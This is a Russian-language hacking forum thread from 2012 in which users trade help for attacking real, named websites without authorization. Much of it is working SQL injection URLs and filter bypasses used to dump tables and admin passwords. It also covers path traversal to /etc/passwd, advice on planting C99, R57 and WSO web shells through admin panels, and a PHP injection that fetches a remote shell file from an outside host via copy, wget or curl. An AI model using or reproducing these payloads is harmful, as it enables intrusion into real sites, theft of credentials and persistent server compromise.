04.01.2012, 12:33
[R]eD,

адресом сайта поделись. И попробуй функцию LOWER(tvoi_text).

А => set+@@global.lower_case_table_names=1 думаю вообще бред.

Groove
04.01.2012, 17:20
Есть папка phpmyadmin где мне найти данные всех баз которые к ней подключены ?

Konqi
04.01.2012, 17:24
Groove said:
Есть папка phpmyadmin где мне найти данные всех баз которые к ней подключены ?


Groove

phpmyadmin всего лишь ИНТЕРФЕЙС для удобной работы с MySQL, о каких данных идет речь? оно подключается к тем базам к которым данный пользователь mysql иммет доступ

Groove
04.01.2012, 17:28
Просто есть машина на которой стоит хостинг и там папка phpmyadmin через которую я захожу в mysql но я думал что я смог бы узнать и другие созданные базы на этой машине /

Konqi
04.01.2012, 17:31
Groove said:
То есть phpmyadmin всего лишь интерфейс для работы с mysql ?




Wiki said:
phpMyAdmin — веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL


кажется ты немного не правильно понимаешь о чем говорю..

phpmyadmin всего лишь посредник, он у себя данные не хранит, имена баз или структура баз, тебе нужно залогинится в него, чтобы увидеть то что доступно твоему пользователю mysql


Groove said:
Просто есть машина на которой стоит хостинг и там папка phpmyadmin через которую я захожу в mysql но я думал что я смог бы узнать и другие созданные базы на этой машине /



не можешь, в папке phpmyadmin ничего стоящего нету, грубо говоря

Groove
04.01.2012, 17:37
Еще вопрос , можно через shell узнать права ftp или сделать себе ?

Konqi
04.01.2012, 17:41
Groove said:
Еще вопрос , можно через shell узнать права ftp или сделать себе ?


большинство фтп серверов используют данные системных пользователей для авторизации, только маленькая часть работает через базу, если у вас первый вариант, то нужны рут права для добавления/редактирования пользователей

Ereee
04.01.2012, 17:42
Groove said:
Еще вопрос , можно через shell узнать права ftp или сделать себе ?


Если ядро старое или есть файл с root/user, то можно получить права рута и сделать фтп. Некоторые хостинги хранят .passwd, .shadow рядом с папкой www(т.е. доступна из под текущего юзера). Можешь эти пароли на FTP попробовать.

P.S. Shell есть, зачем тебе FTP?

Groove
04.01.2012, 19:51
Ereee said:
Если ядро старое или есть файл с root/user, то можно получить права рута и сделать фтп. Некоторые хостинги хранят .passwd, .shadow рядом с папкой www(т.е. доступна из под текущего юзера). Можешь эти пароли на FTP попробовать.
P.S. Shell есть, зачем тебе FTP?



На некоторых папка стоит ограничение прав , через шелл я не могу изменить , а мне нужно скачать целый движок .

jecka3000
04.01.2012, 19:54
Посоветуй реально работающий сканер sql дорков. Sql Poizon уже давно отказывается работать с Google official.

Ereee
04.01.2012, 19:58
2Groove,

рутай.


jecka3000 said:
Посоветуй реально работающий сканер sql дорков. Sql Poizon уже давно отказывается работать с Google official.


Вопрос задан не правильно. Если хочешь просканировать спарсенные сайты, то NetdevilZ пробуй. Если хочешь спрасить, то юзай этот (http://www.wisecat.ru/programmy-i-skripty/svobodnye/parser-google-vydachi-besplatnyi) софт.

faza02
04.01.2012, 21:06
jecka3000, http://grabberz.com/showthread.php?t=30960

sl1k
04.01.2012, 21:52
Не могу понять в чем дело

заливаю обычный (любой) скрипт на сайт - все ок,

заливаю wso2 шелл - пустая страница

aydin-ka
04.01.2012, 22:06
sl1k said:
Не могу понять в чем дело
заливаю обычный (любой) скрипт на сайт - все ок,
заливаю wso2 шелл - пустая страница


Залей другой шелл. Думаю проблема в шелле

Например C99 или R57

pirat0
04.01.2012, 22:59
помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку

aydin-ka
04.01.2012, 23:09
pirat0 said:
помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку


Там что правиться? просто новость в WORD'e? правка шаблона есть?

pirat0
04.01.2012, 23:48
aydin-ka said:
Там что правиться? просто новость в WORD'e? правка шаблона есть?


извини чувак, но ничего не понял из выше написаного

trololoman96
05.01.2012, 00:11
obnovi-soft[antigoogle].ru/software'

Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.

sl1k
05.01.2012, 00:13
aydin-ka said:
Залей другой шелл. Думаю проблема в шелле
Например C99 или R57


Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)

Из за чего эт, мб АВ ?

aydin-ka
05.01.2012, 00:20
pirat0 said:
извини чувак, но ничего не понял из выше написаного


Ссылку дай в ПМ. Посмотрю что смогу сделать...


sl1k said:
Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)
Из за чего эт, мб АВ ?


Может, что-то в коде меня? может неправильно авторизацию поставил?... вариантов много...

qaz
05.01.2012, 02:29
trololoman96 said:
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл

Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45--+



не, ну версию ещо да, а вот например


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45+from+information_schema.tables--+



уже не выводит

M_script
05.01.2012, 06:25
qaz said:
не, ну версию ещо да, а вот например
...
уже не выводит


А так выводит:

?id=14+union+select+1,hex(table_name),...,45+from+ information_schema.tables--+

M_script
05.01.2012, 06:49
trololoman96 said:
obnovi-soft[antigoogle].ru/software'
Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.


Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:

1) false. редирект есть. version() like '4%'

/desktop'and(version())like(0x3425)and'1

2) true. редиректа нет. version() like '5%'.

/desktop'and(version())like(0x3525)and'1

upd:

Точка вырезается, так что придется брутить имена таблиц и колонок

KolosJey
05.01.2012, 12:44
M_script said:
Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:
1)
false
. редирект есть. version() like '4%'
/desktop'and(version())like(0x3425)and'1
2)
true
. редиректа нет. version() like '5%'.
/desktop'and(version())like(0x3525)and'1
upd:
Точка вырезается, так что придется брутить имена таблиц и колонок


Не пугай парня

Вывод:

http://www.obnovi-soft.ru/desktop' and 1=2 union select * from (select 1)a join (select 2)b join (select version())c join (select 4)d join (select 5)i-- '1

Пробелы норм, проблема с запятыми, ну и дальше с точками будет, как ты и сказал

lightangel
05.01.2012, 15:13
I'm stalked here.


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=1 (NO ERROR)



Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1 (ERROR)

Shows site is vulnerable.

Now, I try order by and many things, all do not work.


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1%27+or+1+/!*group*/+by+/!*concat*/%28version%28%29,rand%280%29|0%29+having+min%280%2 9--+

Any help?

shadowrun
05.01.2012, 15:38
lightangel said:
I'm stalked here.

Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=1 (NO ERROR)


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1 (ERROR)

Shows site is vulnerable.
Now, I try order by and many things, all do not work.

Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1%27+or+1+/!*group*/+by+/!*concat*/%28version%28%29,rand%280%29|0%29+having+min%280%2 9--+

Any help?


Там нет скули

faza02
05.01.2012, 16:24
255 order by 1--


получается такой запрос, как избавиться от того, что до моего запроса?

Ereee
05.01.2012, 16:28
faza02 said:
получается такой запрос, как избавиться от того, что до моего запроса?


Никак.

faza02
05.01.2012, 16:53
тогда еще вопрос

подбираю кол-во полей, сначала Unknown column '7' in 'order clause'

а на 6

Table 'wsl.home' doesn't exist

ну и с выводом я потерялся, где он там

и вот, про подзапросы

прочитал я от джкестера /showpost.php?p=1047515&postcount=48

и вопрос, то есть он рассматривает когда при подборе на одном числе ошибка, а на втором ошибка, но уже с выводом?

я такого не встречал просто

вот тут например

http://exchange.guhsd.net/details.php?object_id=2251+order+by+8--

Ereee
05.01.2012, 16:57
faza02 said:
тогда еще вопрос
подбираю кол-во полей, сначала Unknown column '7' in 'order clause'
а на 6
Table 'wsl.home' doesn't exist
ну и с выводом я потерялся, где он там
и вот, про подзапросы
прочитал я от джкестера /showpost.php?p=1047515&postcount=48
и вопрос, то есть он рассматривает когда при подборе на одном числе ошибка, а на втором ошибка, но уже с выводом?
я такого не встречал просто
вот тут например
http://exchange.guhsd.net/details.php?object_id=2251+order+by+8--


Обычно в таких случаях я юзаю error-based. У тебя так выводит, потому что:

http://exchange.guhsd.net/details.php?object_id=2251

wsl.home действительно не существует.

Expl0ited
05.01.2012, 17:17
Code:
http://exchange.guhsd.net/details.php?object_id=(2251)or(1)group+by(concat(v ersion(),0x00,floor(rand(0)*2)))having(min(0)or(1) )

Iggy
05.01.2012, 22:19
Не могу найти(вроде тут видел) дефолтные пути конфигов апача

Expl0ited
05.01.2012, 22:28
Iggy said:
Не могу найти(вроде тут видел) дефолтные пути конфигов апача


/thread49775.html

Iggy
05.01.2012, 22:37
Expl0ited said:
/thread49775.html


Ок, спс. А на замену етте'евскому справочнику itdefence.ru/dbitems/ есть что-нибудь? Или мож то кто копирнуть успел???

Ereee
06.01.2012, 09:34
Iggy said:
Ок, спс. А на замену етте'евскому справочнику
itdefence.ru/dbitems/
есть что-нибудь? Или мож то кто копирнуть успел???


Конечно успел ^^

Держи http://rghost.net/35762282

Веб-версия если что: http://dbitems.wen.ru/index.htm

Iggy
06.01.2012, 22:34
Конечно успел ^^
Держи http://rghost.net/35762282
Веб-версия если что: http://dbitems.wen.ru/index.htm


Красава!

Это что у нас за шелл?

http://img802.imageshack.us/img802/5783/screenshottgl.png

Ereee
06.01.2012, 22:37
Iggy said:
Это что у нас за шелл?


Может быть любым шеллов, написать такую авторизацию 5-6 строк. А вообще с чего ты взял, что это шелл? Мб админка или еще что-то.

Iggy
06.01.2012, 22:40
Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!

aydin-ka
06.01.2012, 22:41
Iggy said:
Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!


C99 ещё немного угадал бы

Ereee
06.01.2012, 22:42
Iggy said:
Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!


Другие залили шелл - ты тоже сможешь. Залей да посмотри

Iggy
06.01.2012, 22:49
aydin-ka said:
C99 ещё немного угадал бы


Не, маднетовский весит 43кб - этот 28кб

если только упакован

...........

ан не, маднетовский упакованный 43кб весит, так что...

Ereee
06.01.2012, 22:51
Iggy said:
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...


так что дай адрес, шелл зальем, самому любопытно стало

qaz
07.01.2012, 02:01
M_script said:
А так выводит:
?id=14+union+select+1,
hex(
table_name
)
,...,45+from+information_schema.tables--+


так пишет

Unknown column '4348415241435445525F53455453' in 'where clause'

Konqi
07.01.2012, 02:05
qaz said:
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'


потому что нужно unhex(hex())

зы

http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+fro m+information_schema.tables+limit+0,1),rand(0)|0)+ having+min(0)--+

M_script
07.01.2012, 02:40
qaz said:
Unknown column '4348415241435445525F53455453' in 'where clause'


Вывод в hex, поэтому нужно конвертировать в строку.

unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.

M_script
07.01.2012, 02:42
Iggy said:
Это что у нас за шелл?
http://img802.imageshack.us/img802/5783/screenshottgl.png


https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост

Внешне похож, размер тоже совпадает (28кб)

faza02
07.01.2012, 19:22
…syntax to use near '.tables limit 1,1--' at line 1


запрос такой

SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--

ему точка не нравится, или он запрос урезает?

Ereee
07.01.2012, 19:25
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?


Думаю фильтруется точка.

Iggy
07.01.2012, 19:29
M_script said:
https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)


Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))

м, глянул твой пост - красиво вскрыл!

Чакэ
07.01.2012, 19:33
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?


infornation написано с ошибкой.

faza02
07.01.2012, 19:38
чакэ, да, ошибся, но запрос не изменило

Ereee, как можно послать запрос? hex? он не сработал

Ereee
07.01.2012, 19:42
Чакэ said:
infor
n
ation написано с ошибкой.


При такой опечатке выдало бы другую ошибку.

faza02,

hex тебе не поможет, я думаю фильтрацию точки обойти нельзя. Попробуй брутить имена таблиц(стандартные users, admin, members и т.д.), смотри на движки и узнай имена таблиц здесь:

http://dbitems.wen.ru

Чакэ
07.01.2012, 19:45
faza02 said:
чакэ, да, ошибся, но запрос не изменило
Ereee, как можно послать запрос? hex? он не сработал


как я такое бревно не заметил select ololo from information..

York
07.01.2012, 19:53
Здаствуйте!

Не могу найти пасс админа. Итак, базы:


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,addr,ban_clic k,ban_stat,ban_view,banner,city,firm,firmtov,forum ,fpage,fronthref,frontpage,golos,ibf_acp_help,ibf_ admin_login_logs,ibf_admin_logs,ibf_admin_permissi on_keys,ibf_admin_permission_rows,ibf_admin_sessio ns,ibf_announcements,ibf_api_log,ibf_api_users,ibf _attachments,ibf_attachments_type,ibf_badwords,ibf _banfilters,ibf_bbcode_mediatag,ibf_bulk_mail,ibf_ cache_store,ibf_cal_calendars,ibf_cal_events,ibf_c aptcha,ibf_components,ibf_conf_settings,ibf_conf_s ettings_titles,ibf_contacts,ibf_content_cache_post s,ibf_content_cache_sigs,ibf_converge_local,ibf_co re_applications,ibf_core_hooks,ibf_core_hooks_file s,ibf_core_incoming_emails,ibf_core_item_markers,i bf_core_item_markers_storage,ibf_core_like,ibf_cor e_like_cache,ibf_core_rss_imported,ibf_core_share_ links,ibf_core_share_lin


Нашел что-то похожее на правду в базе ibf_admin_login_logs:


497:95.26.233.1:Lisaveta:1293725743:1:a:2:{s:3:"get";a:3:{s:6:"adsess";s:32:"adf50898331c99087d5750013949a5d6";s:3:"act";s:5:"login";s:4:"code";s:14:"login-complete";}s:4:"post";a:3:{s:7:"qstring";s:91:"old_adsess=adf50898331c99087d5750013949a5d6&section=content&act=mem&code=search";s:8:"username";s:8:"Lisaveta";s:8:"password";s:6:"*****n";}},


По структуре:


admin_id,admin_ip_address,admin_username,admin_tim e,admin_success,admin_post_details

Ereee
07.01.2012, 19:55
2York,

-1'+union+select+1,concat(name,0x3a,password),3+fro m+ibf_members+limit+0,1--+a

Чакэ
07.01.2012, 19:58
York said:
Здаствуйте!
Не могу найти пасс админа. Итак, базы:
Нашел что-то похожее на правду в базе ibf_admin_login_logs:
По структуре:


сливай бд через columns, а не tables. а там заодно тяни table_name & table_schema сразу будет видно что где лежит..

York
07.01.2012, 20:07
Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs

Gorev
07.01.2012, 21:04
York said:
Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs


хрен ты там найдешь логин админа..они совсем в другой таблице...изучи сначала структуру ИПБ потом изучи синтаксис мускуля..

Konqi
07.01.2012, 22:07
York

почитайте статьи, срач запрещено

NZT, вопросы по сканерам и по крекерам интернета отправьте в гугл =\

[R]eD
07.01.2012, 23:33
есть скуля, все выводится и работает но посылая например такой запрос

SELECT `name` FROM `users` WHERE `user_id` = 1

сервер переводит имя таблицы в верхний регистр (USERS)

т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.

вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине

NZT
08.01.2012, 00:24
Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?

Konqi
08.01.2012, 00:28
NZT said:
Konqi
со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?


смотрите имя темы, и подумайте, является ли ваш вопрос "вопросом по уязвимостям"

здесь обсуждают уязвимости, а не программы которые ищут уязвимости в гугле и тп.. это не для нашего форума

надеюсь ясно высказался..

попугай
08.01.2012, 00:29
eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине


попробуй

SELECT `name` FROM lower(`users`) WHERE `user_id` = 1

[R]eD
08.01.2012, 00:32
попугай said:
попробуй
SELECT `name` FROM lower(`users`) WHERE `user_id` = 1


так нарушается синтаксис и выдает ошибку.

попугай
08.01.2012, 00:36
eD"]
[R]eD said:
так нарушается синтаксис и выдает ошибку.


SELECT `name` FROM lower('users') WHERE `user_id` = 1

возможно, так

Чакэ
08.01.2012, 00:40
попугай said:
SELECT `name` FROM lower('users') WHERE `user_id` = 1
возможно, так


эти функции распространяются только на элементы выборки. с именами таблиц такое не катит.

lightangel
08.01.2012, 01:41
Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9



Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5, 6,7,8,9

I cannot get vulnerable column why?

And no, I don't wanna use blind.

Konqi
08.01.2012, 01:54
lightangel said:

Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9


Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5, 6,7,8,9

I cannot get vulnerable column why?
And no, I don't wanna use blind.




Code:
cmd> POST /news.php HTTP/1.0

newsid=1320+and+0+union+select+1,2,3,4,5,6,7,8,9--+

M_script
08.01.2012, 02:58
eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине


Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.

В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.

верно:


Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;

неверно:


Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;


upd:

Ошибся. Все таки таблицы - это файлы

[R]eD
08.01.2012, 17:08
M_script said:
Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.
В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.
верно:

Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;

неверно:

Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;



http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html

сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос

Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist

abc_user 100% существует (проверял в information_schema)

stepashka_
08.01.2012, 17:18
eD"]
[R]eD said:
http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html
сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос
Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist
abc_user 100% существует (проверял в information_schema)


Может быть abc_user просто в другой базе?

Проверь.

union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572

[R]eD
08.01.2012, 17:38
stepashka_ said:
Может быть abc_user просто в другой базе?
Проверь.
union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572


самое веселое что и 0x6162635f75736572

он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.

ладно. похоже тут ничего не сделать.

Ereee
08.01.2012, 17:41
eD"]
[R]eD said:
самое веселое что и 0x6162635f75736572
он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.
ладно. похоже тут ничего не сделать.


Блин, RED, поделись уже ссылкой.

KolosJey
08.01.2012, 18:52
M_script said:
Это не имена файлов


А что это?

NZT
08.01.2012, 22:57
Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.

stepashka_
08.01.2012, 23:01
NZT said:
Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.


/thread35802.html

NZT
08.01.2012, 23:12
stepashka_ , скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или Tor достаточно для этих сайтов?

Skipp
08.01.2012, 23:50
Вот из темы PHP иньекций я взял пример


Code:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00

Скажите пожалуйста, как узнать сколько подставлять ../ ? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка


Code:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97

Объясните пож-та на данном примере что именно ../../../../../etc/passwd%00 надо подставлять.

Konqi
08.01.2012, 23:54
Skipp said:
Вот из темы PHP иньекций я взял пример

Code:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00

Скажите пожалуйста, как узнать сколько подставлять
../
? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка

Code:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97

Объясните пож-та на данном примере что именно
../../../../../etc/passwd%00
надо подставлять.



../ = директорыя выше

./ = данная директория

дир = /papka1/papka2/papka3/

чтобы выйти за пределы этих папок, надо подставить 3 пары

../../../

в твоем примере

папка = /home/www/z74500/bombaticket.ru/

то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории

Skipp
09.01.2012, 00:11
Konqi said:
в твоем примере
папка = /home/www/z74500/bombaticket.ru/
то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории


Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.

shadowrun
09.01.2012, 00:13
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php

не?

Konqi
09.01.2012, 00:18
Skipp said:
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.


4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти


shadowrun said:
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?


это когда pg.php стал папкой?

Skipp
09.01.2012, 00:18
Да, понятно.

ocheretko
09.01.2012, 00:45
Нашел уязвимость, отсылаю пост запрос с содержимым:

$modi=

все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h

Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:

file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';

только как избавится от кавычек?

Konqi
09.01.2012, 00:47
ocheretko said:
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?



copy($_GET[a],$_GET);

через гет отправь

a=http://site.ru/shell.txt&b=/var/www/html/shell.php

если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl

stepashka_
09.01.2012, 00:48
NZT said:
stepashka_
, скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или
Tor достаточно для этих сайтов?


Поставь себе на комп бажную цмс и тренируйся

Или купи vpn.

ocheretko
09.01.2012, 01:19
Благодарю, все получилось, +1 прием в голову


PHP:
Dim url as String = "example.com"

Dim postdata As String = "modi="

openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"

NZT
09.01.2012, 09:53
stepashka_ said:
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.


Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней )

А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю )

Спасибо.

И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?

DyukiN
09.01.2012, 13:05
как залить шелл в xoops через админку?

Ereee
09.01.2012, 14:33
DyukiN said:
как залить шелл в xoops через админку?


/showpost.php?p=2962252&postcount=4

pirat0
09.01.2012, 15:31
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,

York
09.01.2012, 15:35
Очень часто сталкиваюсь вот с такой проблемой, при запросе вида.php?id=-1+union+select+1,2,group_concat(column_name)+from+ information_schema.columns+where+table_name='Shop_ user'+--+

Пишет ошибку:

ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'Shop_user\' --' at line 1

Тоесть ругается на кавычки чтоль? Пробывал 'Shop_user' шифровать. При шифровке выводится стиль страницы с пустым содержимым. Тоесть на месте принтабельного поля ничего нету. Помогите пожалуйсто.

Ereee
09.01.2012, 15:38
pirat0 said:
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,


Попробуй подставить в параметр act имя несуществуещего файла или подставь кавычку, слеши, вообщем вызови таким образом ошибку. После этого увидишь путь Failed to open stream.. бла бла... /home/path/htdos/files/nesuch_file.php

Если не поможет, то попробуй угадать названия папок, может листинг есть.

2York,

у тебя mq=on, поэтому загони имя таблицы в hex. Тогда синтаксис будет таков:


Code:
table_name=0x53686f705f2075736572--+a

York
09.01.2012, 15:51
Не.. никак.. вот ссыль

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+

pirat0
09.01.2012, 15:55
York said:
Не.. никак.. вот ссыль
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+


http://neoklimat.ru/pages.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x53686F705F75736572 +limit+0,20+--+

вот так катит просто перебором делай, через limit

pirat0
09.01.2012, 15:58
Ereee, нету там (в моем вопросе) листинга директорий, подставлял неверный запрос просто пустая страница(

York
09.01.2012, 15:58
Спасибо

Ereee
09.01.2012, 15:58
2pirat0,

скинь URL в ЛС.

2York,

Все выводится:

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6F705F75736572--

York
09.01.2012, 16:00
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+

